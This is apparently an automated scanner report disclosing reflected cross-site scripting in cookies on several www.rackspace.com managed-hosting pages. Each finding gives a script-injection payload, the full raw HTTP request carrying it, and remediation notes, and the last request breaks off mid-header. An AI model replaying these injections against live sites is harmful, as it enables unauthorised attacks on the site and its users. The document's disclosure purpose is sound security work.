GET /managed_hosting/dedicated_servers.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f833404"%3balert(1)//57e2c40e1d4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f03b"%3balert(1)//03c1859654d was submitted in the chatslider cookie. This input was echoed as 2f03b";alert(1)//03c1859654d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/dedicated_servers.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2f03b"%3balert(1)//03c1859654d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f480"><script>alert(1)</script>e9535403bb1 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/dedicated_servers.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4f480"><script>alert(1)</script>e9535403bb1; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51cf"><script>alert(1)</script>340a81d4041 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/ecommerce/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8f51cf"><script>alert(1)</script>340a81d4041; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 820b3"%3balert(1)//e86c1e3065f was submitted in the IS_UASrackuid cookie. This input was echoed as 820b3";alert(1)//e86c1e3065f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/ecommerce/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8820b3"%3balert(1)//e86c1e3065f; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14541"%3balert(1)//13fe87add69 was submitted in the chatslider cookie. This input was echoed as 14541";alert(1)//13fe87add69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/ecommerce/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D14541"%3balert(1)//13fe87add69; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5095"><script>alert(1)</script>4fe2686fc8e was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/ecommerce/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc5095"><script>alert(1)</script>4fe2686fc8e; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the lpUASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ec18"><script>alert(1)</script>702b54d400a was submitted in the lpUASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/ecommerce/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f84ec18"><script>alert(1)</script>702b54d400a; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0d33"><script>alert(1)</script>614c3dc012b was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d0d33"><script>alert(1)</script>614c3dc012b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb4b1"%3balert(1)//440e9be975d was submitted in the IS_UASrackuid cookie. This input was echoed as bb4b1";alert(1)//440e9be975d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8bb4b1"%3balert(1)//440e9be975d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3203"%3balert(1)//4684dedc99 was submitted in the chatslider cookie. This input was echoed as d3203";alert(1)//4684dedc99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dd3203"%3balert(1)//4684dedc99; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52253"><script>alert(1)</script>87b31546f23 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D52253"><script>alert(1)</script>87b31546f23; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bf79"><script>alert(1)</script>0314c32317d was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/managed_colocation/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87bf79"><script>alert(1)</script>0314c32317d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df6a2"%3balert(1)//7c034f95656 was submitted in the IS_UASrackuid cookie. This input was echoed as df6a2";alert(1)//7c034f95656 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/managed_colocation/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8df6a2"%3balert(1)//7c034f95656; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; 